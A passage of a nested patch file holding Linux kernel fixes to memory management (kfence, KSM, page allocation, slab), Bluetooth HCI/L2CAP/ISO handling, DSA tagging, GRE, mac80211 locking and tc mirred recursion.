++}
++
+ static DEFINE_MTREE(tree);
+ static int maple_tree_seed(void)
+ {
+@@ -2854,6 +2897,11 @@ static int maple_tree_seed(void)
+ 	check_empty_area_window(&tree);
+ 	mtree_destroy(&tree);
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_empty_area_fill(&tree);
++	mtree_destroy(&tree);
++
++
+ #if defined(BENCH)
+ skip:
+ #endif
+diff --git a/mm/kfence/Makefile b/mm/kfence/Makefile
+index 0bb95728a7845..2de2a58d11a10 100644
+--- a/mm/kfence/Makefile
++++ b/mm/kfence/Makefile
+@@ -2,5 +2,5 @@
+ 
+ obj-y := core.o report.o
+ 
+-CFLAGS_kfence_test.o := -g -fno-omit-frame-pointer -fno-optimize-sibling-calls
++CFLAGS_kfence_test.o := -fno-omit-frame-pointer -fno-optimize-sibling-calls
+ obj-$(CONFIG_KFENCE_KUNIT_TEST) += kfence_test.o
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index 5349c37a5dac9..79c94ee55f97b 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -726,10 +726,14 @@ static const struct seq_operations objects_sops = {
+ };
+ DEFINE_SEQ_ATTRIBUTE(objects);
+ 
+-static int __init kfence_debugfs_init(void)
++static int kfence_debugfs_init(void)
+ {
+-	struct dentry *kfence_dir = debugfs_create_dir("kfence", NULL);
++	struct dentry *kfence_dir;
+ 
++	if (!READ_ONCE(kfence_enabled))
++		return 0;
++
++	kfence_dir = debugfs_create_dir("kfence", NULL);
+ 	debugfs_create_file("stats", 0444, kfence_dir, NULL, &stats_fops);
+ 	debugfs_create_file("objects", 0400, kfence_dir, NULL, &objects_fops);
+ 	return 0;
+@@ -883,6 +887,8 @@ static int kfence_init_late(void)
+ 	}
+ 
+ 	kfence_init_enable();
++	kfence_debugfs_init();
++
+ 	return 0;
+ }
+ 
+diff --git a/mm/ksm.c b/mm/ksm.c
+index addf490da1464..83450d32e109d 100644
+--- a/mm/ksm.c
++++ b/mm/ksm.c
+@@ -988,9 +988,15 @@ static int unmerge_and_remove_all_rmap_items(void)
+ 
+ 		mm = mm_slot->slot.mm;
+ 		mmap_read_lock(mm);
++
++		/*
++		 * Exit right away if mm is exiting to avoid lockdep issue in
++		 * the maple tree
++		 */
++		if (ksm_test_exit(mm))
++			goto mm_exiting;
++
+ 		for_each_vma(vmi, vma) {
+-			if (ksm_test_exit(mm))
+-				break;
+ 			if (!(vma->vm_flags & VM_MERGEABLE) || !vma->anon_vma)
+ 				continue;
+ 			err = unmerge_ksm_pages(vma,
+@@ -999,6 +1005,7 @@ static int unmerge_and_remove_all_rmap_items(void)
+ 				goto error;
+ 		}
+ 
++mm_exiting:
+ 		remove_trailing_rmap_items(&mm_slot->rmap_list);
+ 		mmap_read_unlock(mm);
+ 
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 3bb3484563eda..dab67b14e178d 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -1391,6 +1391,7 @@ static __always_inline bool free_pages_prepare(struct page *page,
+ 			unsigned int order, bool check_free, fpi_t fpi_flags)
+ {
+ 	int bad = 0;
++	bool skip_kasan_poison = should_skip_kasan_poison(page, fpi_flags);
+ 	bool init = want_init_on_free();
+ 
+ 	VM_BUG_ON_PAGE(PageTail(page), page);
+@@ -1463,7 +1464,7 @@ static __always_inline bool free_pages_prepare(struct page *page,
+ 	 * With hardware tag-based KASAN, memory tags must be set before the
+ 	 * page becomes unavailable via debug_pagealloc or arch_free_page.
+ 	 */
+-	if (!should_skip_kasan_poison(page, fpi_flags)) {
++	if (!skip_kasan_poison) {
+ 		kasan_poison_pages(page, order, init);
+ 
+ 		/* Memory is already initialized if KASAN did it internally. */
+diff --git a/mm/slab.c b/mm/slab.c
+index 29300fc1289a8..ae625e769e5d6 100644
+--- a/mm/slab.c
++++ b/mm/slab.c
+@@ -840,7 +840,7 @@ static int init_cache_node(struct kmem_cache *cachep, int node, gfp_t gfp)
+ 	return 0;
+ }
+ 
+-#if (defined(CONFIG_NUMA) && defined(CONFIG_MEMORY_HOTPLUG)) || defined(CONFIG_SMP)
++#if defined(CONFIG_NUMA) || defined(CONFIG_SMP)
+ /*
+  * Allocates and initializes node for a node on each slab cache, used for
+  * either memory or cpu hotplug.  If memory is being hot-added, the kmem_cache_node
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index b65c3aabcd536..334e308451f53 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2871,10 +2871,25 @@ int hci_recv_frame(struct hci_dev *hdev, struct sk_buff *skb)
+ 		return -ENXIO;
+ 	}
+ 
+-	if (hci_skb_pkt_type(skb) != HCI_EVENT_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_ACLDATA_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_SCODATA_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_ISODATA_PKT) {
++	switch (hci_skb_pkt_type(skb)) {
++	case HCI_EVENT_PKT:
++		break;
++	case HCI_ACLDATA_PKT:
++		/* Detect if ISO packet has been sent as ACL */
++		if (hci_conn_num(hdev, ISO_LINK)) {
++			__u16 handle = __le16_to_cpu(hci_acl_hdr(skb)->handle);
++			__u8 type;
++
++			type = hci_conn_lookup_type(hdev, hci_handle(handle));
++			if (type == ISO_LINK)
++				hci_skb_pkt_type(skb) = HCI_ISODATA_PKT;
++		}
++		break;
++	case HCI_SCODATA_PKT:
++		break;
++	case HCI_ISODATA_PKT:
++		break;
++	default:
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 117eedb6f7099..5a6aa1627791b 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -643,6 +643,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 	cancel_work_sync(&hdev->cmd_sync_work);
+ 	cancel_work_sync(&hdev->reenable_adv_work);
+ 
++	mutex_lock(&hdev->cmd_sync_work_lock);
+ 	list_for_each_entry_safe(entry, tmp, &hdev->cmd_sync_work_list, list) {
+ 		if (entry->destroy)
+ 			entry->destroy(hdev, entry->data, -ECANCELED);
+@@ -650,6 +651,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 		list_del(&entry->list);
+ 		kfree(entry);
+ 	}
++	mutex_unlock(&hdev->cmd_sync_work_lock);
+ }
+ 
+ void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+@@ -2367,6 +2369,45 @@ static int hci_resume_advertising_sync(struct hci_dev *hdev)
+ 	return err;
+ }
+ 
++static int hci_pause_addr_resolution(struct hci_dev *hdev)
++{
++	int err;
++
++	if (!use_ll_privacy(hdev))
++		return 0;
++
++	if (!hci_dev_test_flag(hdev, HCI_LL_RPA_RESOLUTION))
++		return 0;
++
++	/* Cannot disable addr resolution if scanning is enabled or
++	 * when initiating an LE connection.
++	 */
++	if (hci_dev_test_flag(hdev, HCI_LE_SCAN) ||
++	    hci_lookup_le_connect(hdev)) {
++		bt_dev_err(hdev, "Command not allowed when scan/LE connect");
++		return -EPERM;
++	}
++
++	/* Cannot disable addr resolution if advertising is enabled. */
++	err = hci_pause_advertising_sync(hdev);
++	if (err) {
++		bt_dev_err(hdev, "Pause advertising failed: %d", err);
++		return err;
++	}
++
++	err = hci_le_set_addr_resolution_enable_sync(hdev, 0x00);
++	if (err)
++		bt_dev_err(hdev, "Unable to disable Address Resolution: %d",
++			   err);
++
++	/* Return if address resolution is disabled and RPA is not used. */
++	if (!err && scan_use_rpa(hdev))
++		return err;
++
++	hci_resume_advertising_sync(hdev);
++	return err;
++}
++
+ struct sk_buff *hci_read_local_oob_data_sync(struct hci_dev *hdev,
+ 					     bool extended, struct sock *sk)
+ {
+@@ -2402,7 +2443,7 @@ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ 	u8 filter_policy;
+ 	int err;
+ 
+-	/* Pause advertising if resolving list can be used as controllers are
++	/* Pause advertising if resolving list can be used as controllers
+ 	 * cannot accept resolving list modifications while advertising.
+ 	 */
+ 	if (use_ll_privacy(hdev)) {
+@@ -3319,6 +3360,7 @@ static const struct hci_init_stage amp_init1[] = {
+ 	HCI_INIT(hci_read_flow_control_mode_sync),
+ 	/* HCI_OP_READ_LOCATION_DATA */
+ 	HCI_INIT(hci_read_location_data_sync),
++	{}
+ };
+ 
+ static int hci_init1_sync(struct hci_dev *hdev)
+@@ -3353,6 +3395,7 @@ static int hci_init1_sync(struct hci_dev *hdev)
+ static const struct hci_init_stage amp_init2[] = {
+ 	/* HCI_OP_READ_LOCAL_FEATURES */
+ 	HCI_INIT(hci_read_local_features_sync),
++	{}
+ };
+ 
+ /* Read Buffer Size (ACL mtu, max pkt, etc.) */
+@@ -5394,27 +5437,12 @@ static int hci_active_scan_sync(struct hci_dev *hdev, uint16_t interval)
+ 
+ 	cancel_interleave_scan(hdev);
+ 
+-	/* Pause advertising since active scanning disables address resolution
+-	 * which advertising depend on in order to generate its RPAs.
+-	 */
+-	if (use_ll_privacy(hdev) && hci_dev_test_flag(hdev, HCI_PRIVACY)) {
+-		err = hci_pause_advertising_sync(hdev);
+-		if (err) {
+-			bt_dev_err(hdev, "pause advertising failed: %d", err);
+-			goto failed;
+-		}
+-	}
+-
+-	/* Disable address resolution while doing active scanning since the
+-	 * accept list shall not be used and all reports shall reach the host
+-	 * anyway.
++	/* Pause address resolution for active scan and stop advertising if
++	 * privacy is enabled.
+ 	 */
+-	err = hci_le_set_addr_resolution_enable_sync(hdev, 0x00);
+-	if (err) {
+-		bt_dev_err(hdev, "Unable to disable Address Resolution: %d",
+-			   err);
++	err = hci_pause_addr_resolution(hdev);
++	if (err)
+ 		goto failed;
+-	}
+ 
+ 	/* All active scans will be done with either a resolvable private
+ 	 * address (when privacy feature has been enabled) or non-resolvable
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 24444b502e586..8d136a7301630 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -1620,7 +1620,6 @@ static void iso_disconn_cfm(struct hci_conn *hcon, __u8 reason)
+ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ {
+ 	struct iso_conn *conn = hcon->iso_data;
+-	struct hci_iso_data_hdr *hdr;
+ 	__u16 pb, ts, len;
+ 
+ 	if (!conn)
+@@ -1642,6 +1641,8 @@ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ 		}
+ 
+ 		if (ts) {
++			struct hci_iso_ts_data_hdr *hdr;
++
+ 			/* TODO: add timestamp to the packet? */
+ 			hdr = skb_pull_data(skb, HCI_ISO_TS_DATA_HDR_SIZE);
+ 			if (!hdr) {
+@@ -1649,15 +1650,19 @@ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ 				goto drop;
+ 			}
+ 
++			len = __le16_to_cpu(hdr->slen);
+ 		} else {
++			struct hci_iso_data_hdr *hdr;
++
+ 			hdr = skb_pull_data(skb, HCI_ISO_DATA_HDR_SIZE);
+ 			if (!hdr) {
+ 				BT_ERR("Frame is too short (len %d)", skb->len);
+ 				goto drop;
+ 			}
++
++			len = __le16_to_cpu(hdr->slen);
+ 		}
+ 
+-		len    = __le16_to_cpu(hdr->slen);
+ 		flags  = hci_iso_data_flags(len);
+ 		len    = hci_iso_data_len(len);
+ 
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index adfc3ea06d088..49926f59cc123 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -708,6 +708,17 @@ void l2cap_chan_del(struct l2cap_chan *chan, int err)
+ }
+ EXPORT_SYMBOL_GPL(l2cap_chan_del);
+ 
++static void __l2cap_chan_list_id(struct l2cap_conn *conn, u16 id,
++				 l2cap_chan_func_t func, void *data)
++{
++	struct l2cap_chan *chan, *l;
++
++	list_for_each_entry_safe(chan, l, &conn->chan_l, list) {
++		if (chan->ident == id)
++			func(chan, data);
++	}
++}
++
+ static void __l2cap_chan_list(struct l2cap_conn *conn, l2cap_chan_func_t func,
+ 			      void *data)
+ {
+@@ -775,23 +786,9 @@ static void l2cap_chan_le_connect_reject(struct l2cap_chan *chan)
+ 
+ static void l2cap_chan_ecred_connect_reject(struct l2cap_chan *chan)
+ {
+-	struct l2cap_conn *conn = chan->conn;
+-	struct l2cap_ecred_conn_rsp rsp;
+-	u16 result;
+-
+-	if (test_bit(FLAG_DEFER_SETUP, &chan->flags))
+-		result = L2CAP_CR_LE_AUTHORIZATION;
+-	else
+-		result = L2CAP_CR_LE_BAD_PSM;
+-
+ 	l2cap_state_change(chan, BT_DISCONN);
+ 
+-	memset(&rsp, 0, sizeof(rsp));
+-
+-	rsp.result  = cpu_to_le16(result);
+-
+-	l2cap_send_cmd(conn, chan->ident, L2CAP_LE_CONN_RSP, sizeof(rsp),
+-		       &rsp);
++	__l2cap_ecred_conn_rsp_defer(chan);
+ }
+ 
+ static void l2cap_chan_connect_reject(struct l2cap_chan *chan)
+@@ -846,7 +843,7 @@ void l2cap_chan_close(struct l2cap_chan *chan, int reason)
+ 					break;
+ 				case L2CAP_MODE_EXT_FLOWCTL:
+ 					l2cap_chan_ecred_connect_reject(chan);
+-					break;
++					return;
+ 				}
+ 			}
+ 		}
+@@ -3938,43 +3935,86 @@ void __l2cap_le_connect_rsp_defer(struct l2cap_chan *chan)
+ 		       &rsp);
+ }
+ 
+-void __l2cap_ecred_conn_rsp_defer(struct l2cap_chan *chan)
++static void l2cap_ecred_list_defer(struct l2cap_chan *chan, void *data)
+ {
++	int *result = data;
++
++	if (*result || test_bit(FLAG_ECRED_CONN_REQ_SENT, &chan->flags))
++		return;
++
++	switch (chan->state) {
++	case BT_CONNECT2:
++		/* If channel still pending accept add to result */
++		(*result)++;
++		return;
++	case BT_CONNECTED:
++		return;
++	default:
++		/* If not connected or pending accept it has been refused */
++		*result = -ECONNREFUSED;
++		return;
++	}
++}
++
++struct l2cap_ecred_rsp_data {
+ 	struct {
+ 		struct l2cap_ecred_conn_rsp rsp;
+-		__le16 dcid[5];
++		__le16 scid[L2CAP_ECRED_MAX_CID];
+ 	} __packed pdu;
++	int count;
++};
++
++static void l2cap_ecred_rsp_defer(struct l2cap_chan *chan, void *data)
++{
++	struct l2cap_ecred_rsp_data *rsp = data;
++
++	if (test_bit(FLAG_ECRED_CONN_REQ_SENT, &chan->flags))
++		return;
++
++	/* Reset ident so only one response is sent */
++	chan->ident = 0;
++
++	/* Include all channels pending with the same ident */
++	if (!rsp->pdu.rsp.result)
++		rsp->pdu.rsp.dcid[rsp->count++] = cpu_to_le16(chan->scid);
++	else
++		l2cap_chan_del(chan, ECONNRESET);
++}
++
++void __l2cap_ecred_conn_rsp_defer(struct l2cap_chan *chan)
++{
+ 	struct l2cap_conn *conn = chan->conn;
+-	u16 ident = chan->ident;
+-	int i = 0;
++	struct l2cap_ecred_rsp_data data;
++	u16 id = chan->ident;
++	int result = 0;
+ 
+-	if (!ident)
++	if (!id)
+ 		return;
+ 
+-	BT_DBG("chan %p ident %d", chan, ident);
++	BT_DBG("chan %p id %d", chan, id);
+ 
+-	pdu.rsp.mtu     = cpu_to_le16(chan->imtu);
+-	pdu.rsp.mps     = cpu_to_le16(chan->mps);
+-	pdu.rsp.credits = cpu_to_le16(chan->rx_credits);
+-	pdu.rsp.result  = cpu_to_le16(L2CAP_CR_LE_SUCCESS);
++	memset(&data, 0, sizeof(data));
+ 
+-	mutex_lock(&conn->chan_lock);
++	data.pdu.rsp.mtu     = cpu_to_le16(chan->imtu);
++	data.pdu.rsp.mps     = cpu_to_le16(chan->mps);
++	data.pdu.rsp.credits = cpu_to_le16(chan->rx_credits);
++	data.pdu.rsp.result  = cpu_to_le16(L2CAP_CR_LE_SUCCESS);
+ 
+-	list_for_each_entry(chan, &conn->chan_l, list) {
+-		if (chan->ident != ident)
+-			continue;
++	/* Verify that all channels are ready */
++	__l2cap_chan_list_id(conn, id, l2cap_ecred_list_defer, &result);
+ 
+-		/* Reset ident so only one response is sent */
+-		chan->ident = 0;
++	if (result > 0)
++		return;
+ 
+-		/* Include all channels pending with the same ident */
+-		pdu.dcid[i++] = cpu_to_le16(chan->scid);
+-	}
++	if (result < 0)
++		data.pdu.rsp.result = cpu_to_le16(L2CAP_CR_LE_AUTHORIZATION);
+ 
+-	mutex_unlock(&conn->chan_lock);
++	/* Build response */
++	__l2cap_chan_list_id(conn, id, l2cap_ecred_rsp_defer, &data);
+ 
+-	l2cap_send_cmd(conn, ident, L2CAP_ECRED_CONN_RSP,
+-			sizeof(pdu.rsp) + i * sizeof(__le16), &pdu);
++	l2cap_send_cmd(conn, id, L2CAP_ECRED_CONN_RSP,
++		       sizeof(data.pdu.rsp) + (data.count * sizeof(__le16)),
++		       &data.pdu);
+ }
+ 
+ void __l2cap_connect_rsp_defer(struct l2cap_chan *chan)
+@@ -6078,6 +6118,7 @@ static inline int l2cap_ecred_conn_req(struct l2cap_conn *conn,
+ 		__set_chan_timer(chan, chan->ops->get_sndtimeo(chan));
+ 
+ 		chan->ident = cmd->ident;
++		chan->mode = L2CAP_MODE_EXT_FLOWCTL;
+ 
+ 		if (test_bit(FLAG_DEFER_SETUP, &chan->flags)) {
+ 			l2cap_state_change(chan, BT_CONNECT2);
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index d2ea8e19aa1b5..c4a7627b380da 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -4627,12 +4627,6 @@ static int set_mgmt_mesh_func(struct sock *sk, struct hci_dev *hdev,
+ 				       MGMT_OP_SET_EXP_FEATURE,
+ 				       MGMT_STATUS_INVALID_INDEX);
+ 
+-	/* Changes can only be made when controller is powered down */
+-	if (hdev_is_powered(hdev))
+-		return mgmt_cmd_status(sk, hdev->id,
+-				       MGMT_OP_SET_EXP_FEATURE,
+-				       MGMT_STATUS_REJECTED);
+-
+ 	/* Parameters are limited to a single octet */
+ 	if (data_len != MGMT_SET_EXP_FEATURE_SIZE + 1)
+ 		return mgmt_cmd_status(sk, hdev->id,
+@@ -9351,7 +9345,8 @@ static const struct hci_mgmt_handler mgmt_handlers[] = {
+ 	{ add_ext_adv_data,        MGMT_ADD_EXT_ADV_DATA_SIZE,
+ 						HCI_MGMT_VAR_LEN },
+ 	{ add_adv_patterns_monitor_rssi,
+-				   MGMT_ADD_ADV_PATTERNS_MONITOR_RSSI_SIZE },
++				   MGMT_ADD_ADV_PATTERNS_MONITOR_RSSI_SIZE,
++						HCI_MGMT_VAR_LEN },
+ 	{ set_mesh,                MGMT_SET_MESH_RECEIVER_SIZE,
+ 						HCI_MGMT_VAR_LEN },
+ 	{ mesh_features,           MGMT_MESH_READ_FEATURES_SIZE },
+diff --git a/net/dsa/tag.c b/net/dsa/tag.c
+index b2fba1a003ce3..5105a5ff58fa2 100644
+--- a/net/dsa/tag.c
++++ b/net/dsa/tag.c
+@@ -114,7 +114,7 @@ static int dsa_switch_rcv(struct sk_buff *skb, struct net_device *dev,
+ 		skb = nskb;
+ 	}
+ 
+-	dev_sw_netstats_rx_add(skb->dev, skb->len);
++	dev_sw_netstats_rx_add(skb->dev, skb->len + ETH_HLEN);
+ 
+ 	if (dsa_skb_defer_rx_timestamp(p, skb))
+ 		return 0;
+diff --git a/net/dsa/tag_brcm.c b/net/dsa/tag_brcm.c
+index 10239daa57454..cacdafb41200e 100644
+--- a/net/dsa/tag_brcm.c
++++ b/net/dsa/tag_brcm.c
+@@ -7,6 +7,7 @@
+ 
+ #include <linux/dsa/brcm.h>
+ #include <linux/etherdevice.h>
++#include <linux/if_vlan.h>
+ #include <linux/list.h>
+ #include <linux/slab.h>
+ 
+@@ -252,6 +253,7 @@ static struct sk_buff *brcm_leg_tag_xmit(struct sk_buff *skb,
+ static struct sk_buff *brcm_leg_tag_rcv(struct sk_buff *skb,
+ 					struct net_device *dev)
+ {
++	int len = BRCM_LEG_TAG_LEN;
+ 	int source_port;
+ 	u8 *brcm_tag;
+ 
+@@ -266,12 +268,16 @@ static struct sk_buff *brcm_leg_tag_rcv(struct sk_buff *skb,
+ 	if (!skb->dev)
+ 		return NULL;
+ 
++	/* VLAN tag is added by BCM63xx internal switch */
++	if (netdev_uses_dsa(skb->dev))
++		len += VLAN_HLEN;
++
+ 	/* Remove Broadcom tag and update checksum */
+-	skb_pull_rcsum(skb, BRCM_LEG_TAG_LEN);
++	skb_pull_rcsum(skb, len);
+ 
+ 	dsa_default_offload_fwd_mark(skb);
+ 
+-	dsa_strip_etype_header(skb, BRCM_LEG_TAG_LEN);
++	dsa_strip_etype_header(skb, len);
+ 
+ 	return skb;
+ }
+diff --git a/net/ipv4/ip_gre.c b/net/ipv4/ip_gre.c
+index ffff46cdcb58f..e55a202649608 100644
+--- a/net/ipv4/ip_gre.c
++++ b/net/ipv4/ip_gre.c
+@@ -552,7 +552,7 @@ static void erspan_fb_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		truncate = true;
+ 	}
+ 
+-	nhoff = skb_network_header(skb) - skb_mac_header(skb);
++	nhoff = skb_network_offset(skb);
+ 	if (skb->protocol == htons(ETH_P_IP) &&
+ 	    (ntohs(ip_hdr(skb)->tot_len) > skb->len - nhoff))
+ 		truncate = true;
+@@ -561,7 +561,7 @@ static void erspan_fb_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		int thoff;
+ 
+ 		if (skb_transport_header_was_set(skb))
+-			thoff = skb_transport_header(skb) - skb_mac_header(skb);
++			thoff = skb_transport_offset(skb);
+ 		else
+ 			thoff = nhoff + sizeof(struct ipv6hdr);
+ 		if (ntohs(ipv6_hdr(skb)->payload_len) > skb->len - thoff)
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index 89f5f0f3f5d65..a4ecfc9d25930 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -959,7 +959,7 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		truncate = true;
+ 	}
+ 
+-	nhoff = skb_network_header(skb) - skb_mac_header(skb);
++	nhoff = skb_network_offset(skb);
+ 	if (skb->protocol == htons(ETH_P_IP) &&
+ 	    (ntohs(ip_hdr(skb)->tot_len) > skb->len - nhoff))
+ 		truncate = true;
+@@ -968,7 +968,7 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		int thoff;
+ 
+ 		if (skb_transport_header_was_set(skb))
+-			thoff = skb_transport_header(skb) - skb_mac_header(skb);
++			thoff = skb_transport_offset(skb);
+ 		else
+ 			thoff = nhoff + sizeof(struct ipv6hdr);
+ 		if (ntohs(ipv6_hdr(skb)->payload_len) > skb->len - thoff)
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 7ca9bde3c6d25..ba6bbb6be3477 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -1285,6 +1285,9 @@ struct ieee80211_local {
+ 	struct list_head active_txqs[IEEE80211_NUM_ACS];
+ 	u16 schedule_round[IEEE80211_NUM_ACS];
+ 
++	/* serializes ieee80211_handle_wake_tx_queue */
++	spinlock_t handle_wake_tx_queue_lock;
++
+ 	u16 airtime_flags;
+ 	u32 aql_txq_limit_low[IEEE80211_NUM_ACS];
+ 	u32 aql_txq_limit_high[IEEE80211_NUM_ACS];
+diff --git a/net/mac80211/main.c b/net/mac80211/main.c
+index 846528850612a..ddf2b7811c557 100644
+--- a/net/mac80211/main.c
++++ b/net/mac80211/main.c
+@@ -802,6 +802,8 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
+ 	local->aql_threshold = IEEE80211_AQL_THRESHOLD;
+ 	atomic_set(&local->aql_total_pending_airtime, 0);
+ 
++	spin_lock_init(&local->handle_wake_tx_queue_lock);
++
+ 	INIT_LIST_HEAD(&local->chanctx_list);
+ 	mutex_init(&local->chanctx_mtx);
+ 
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 261ac667887f8..9c219e525eded 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -314,6 +314,8 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(txq->vif);
+ 	struct ieee80211_txq *queue;
+ 
++	spin_lock(&local->handle_wake_tx_queue_lock);
++
+ 	/* Use ieee80211_next_txq() for airtime fairness accounting */
+ 	ieee80211_txq_schedule_start(hw, txq->ac);
+ 	while ((queue = ieee80211_next_txq(hw, txq->ac))) {
+@@ -321,6 +323,7 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
+ 		ieee80211_return_txq(hw, queue, false);
+ 	}
+ 	ieee80211_txq_schedule_end(hw, txq->ac);
++	spin_unlock(&local->handle_wake_tx_queue_lock);
+ }
+ EXPORT_SYMBOL(ieee80211_handle_wake_tx_queue);
+ 
+diff --git a/net/mac80211/wme.c b/net/mac80211/wme.c
+index a12c636386801..1601be5764145 100644
+--- a/net/mac80211/wme.c
++++ b/net/mac80211/wme.c
+@@ -147,6 +147,7 @@ u16 ieee80211_select_queue_80211(struct ieee80211_sub_if_data *sdata,
+ u16 ieee80211_select_queue(struct ieee80211_sub_if_data *sdata,
+ 			   struct sta_info *sta, struct sk_buff *skb)
+ {
++	const struct ethhdr *eth = (void *)skb->data;
+ 	struct mac80211_qos_map *qos_map;
+ 	bool qos;
+ 
+@@ -154,8 +155,9 @@ u16 ieee80211_select_queue(struct ieee80211_sub_if_data *sdata,
+ 	skb_get_hash(skb);
+ 
+ 	/* all mesh/ocb stations are required to support WME */
+-	if (sta && (sdata->vif.type == NL80211_IFTYPE_MESH_POINT ||
+-		    sdata->vif.type == NL80211_IFTYPE_OCB))
++	if ((sdata->vif.type == NL80211_IFTYPE_MESH_POINT &&
++	    !is_multicast_ether_addr(eth->h_dest)) ||
++	    (sdata->vif.type == NL80211_IFTYPE_OCB && sta))
+ 		qos = true;
+ 	else if (sta)
+ 		qos = sta->sta.wme;
+diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
+index 7284bcea7b0b1..8037ec9b1d311 100644
+--- a/net/sched/act_mirred.c
++++ b/net/sched/act_mirred.c
+@@ -29,8 +29,8 @@
+ static LIST_HEAD(mirred_list);
+ static DEFINE_SPINLOCK(mirred_list_lock);
+ 
+-#define MIRRED_RECURSION_LIMIT    4
+-static DEFINE_PER_CPU(unsigned int, mirred_rec_level);
++#define MIRRED_NEST_LIMIT    4
++static DEFINE_PER_CPU(unsigned int, mirred_nest_level);
+ 
+ static bool tcf_mirred_is_act_redirect(int action)
+ {
+@@ -206,12 +206,19 @@ release_idr:
+ 	return err;
+ }
+ 
++static bool is_mirred_nested(void)
++{
++	return unlikely(__this_cpu_read(mirred_nest_level) > 1);
++}
++
+ static int tcf_mirred_forward(bool want_ingress, struct sk_buff *skb)
+ {
+ 	int err;
+ 
+ 	if (!want_ingress)
+ 		err = tcf_dev_queue_xmit(skb, dev_queue_xmit);
++	else if (is_mirred_nested())
++		err = netif_rx(skb);
+ 	else
+ 		err = netif_receive_skb(skb);
+ 
+@@ -226,7 +233,7 @@ TC_INDIRECT_SCOPE int tcf_mirred_act(struct sk_buff *skb,
+ 	struct sk_buff *skb2 = skb;
+ 	bool m_mac_header_xmit;
+ 	struct net_device *dev;
+-	unsigned int rec_level;
++	unsigned int nest_level;
+ 	int retval, err = 0;
+ 	bool use_reinsert;
+ 	bool want_ingress;
+@@ -237,11 +244,11 @@ TC_INDIRECT_SCOPE int tcf_mirred_act(struct sk_buff *skb,
+ 	int mac_len;
+ 	bool at_nh;
+ 
+-	rec_level = __this_cpu_inc_return(mirred_rec_level);
+-	if (unlikely(rec_level > MIRRED_RECURSION_LIMIT)) {
++	nest_level = __this_cpu_inc_return(mirred_nest_level);
++	if (unlikely(nest_level > MIRRED_NEST_LIMIT)) {
+ 		net_warn_ratelimited("Packet exceeded mirred recursion limit on dev %s\n",
+ 				     netdev_name(skb->dev));
+-		__this_cpu_dec(mirred_rec_level);
++		__this_cpu_dec(mirred_nest_level);
+ 		return TC_ACT_SHOT;
+ 	}
+ 
+@@ -310,7 +317,7 @@ TC_INDIRECT_SCOPE int tcf_mirred_act(struct sk_buff *skb,
+ 			err = tcf_mirred_forward(want_ingress, skb);
+ 			if (err)
+ 				tcf_action_inc_overlimit_qstats(&m->common);
+-			__this_cpu_dec(mirred_rec_level);
++			__this_cpu_dec(mirred_nest_level);
+ 			return TC_ACT_CONSUMED;
+ 		}
+ 	}
+@@ -322,7 +329,7 @@ out:
+ 		if (tcf_mirred_is_act_redirect(m_eaction))
+ 			retval = TC_ACT_SHOT;
+ 	}
+-	__this_cpu_dec(mirred_rec_level);
++	__this_cpu_dec(mirred_nest_level);
+ 
+ 	return retval;
+ }
+diff --git a/net/xdp/xdp_umem.c b/net/xdp/xdp_umem.c
+index 4681e8e8ad943..02207e852d796 100644
+--- a/net/xdp/xdp_umem.c
++++ b/net/xdp/xdp_umem.c
+@@ -150,10 +150,11 @@ static int xdp_umem_account_pages(struct xdp_umem *umem)
+ 
+ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ {
+-	u32 npgs_rem, chunk_size = mr->chunk_size, headroom = mr->headroom;
+ 	bool unaligned_chunks = mr->flags & XDP_UMEM_UNALIGNED_CHUNK_FLAG;
+-	u64 npgs, addr = mr->addr, size = mr->len;
